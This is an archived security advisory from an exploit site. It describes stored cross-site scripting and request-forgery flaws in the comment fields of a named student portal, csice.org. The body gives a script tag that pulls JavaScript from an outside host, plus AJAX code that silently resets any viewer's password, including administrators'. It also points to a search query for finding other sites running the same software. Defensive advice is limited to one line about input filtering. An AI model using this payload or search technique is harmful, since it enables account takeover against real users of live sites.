what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CSICE Cross Site Request Forgery / Cross Site Scripting

CSICE Cross Site Request Forgery / Cross Site Scripting
Posted Mar 16, 2010
Authored by FB1H2S

CSICE suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 740d08e10637bef23e3391f65b45c2fd3f40f91b785b063effed7c1665fab755

CSICE Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
http://www.csice.org/
Suffers from XSS and CSRF cross site scripting and cross site request
forgery attacks.
The vulnerability lies in the Post comment filelds in the following page
move to this page 'only for authenticated user'
http://www.csice.org/student/subjects.html

and choose a subject and
http://www.csice.org/student/LessonPosting/59/0/view_units.html

here users are allowed to post comments there,but the comments r not
filtered possibly allowing any one to inject scripts too

like we could update a post with a comment like
<script>alert('Hacked by FB1H2S')</script>

which ill get updated on the DATABASE and the next time when some one
views the page tht page ill alert with javascript alert statnment.

This attack could be taken to another extend,now tht we could run
javascripts on client side we may build a java script, which when runs
ill change the user password to a new value, all we have to do is
update the code in the comment field and when some other user views
the page the script for change password ill get executed and ,his or
her password ill be changed.

Consider for example :
post comment with this
<SCRIPT SRC="http://fb1h2s.byethost15.com/sas.js"></SCRIPT>

wht sas.js do is change the user password to 'hacked' when run on the victim,

var pass_req = createAjaxObject();
var data = 'hacked';
alert(data);
pass_req.open("post","http://www.csice.org/student/ajax_redirect.php?page=student&option=change_password");
pass_req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
pass_req.send("data="+data);

So using this hack we could hack change any users/administrtors
password to a new value

I am not able to figure out what CMS this site runs on, but it surel is an open source CMS, see the inurl:ajax_redirect.php?page=
you could see a lot of results


Filtering the input Will be the way to prevent these issues, have a look at
our website and this paper on how to prevent such attacks
http://www.whitec0de.com/paper/0121

love FB1H2S
hcking is matter of time knowldge and patience
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close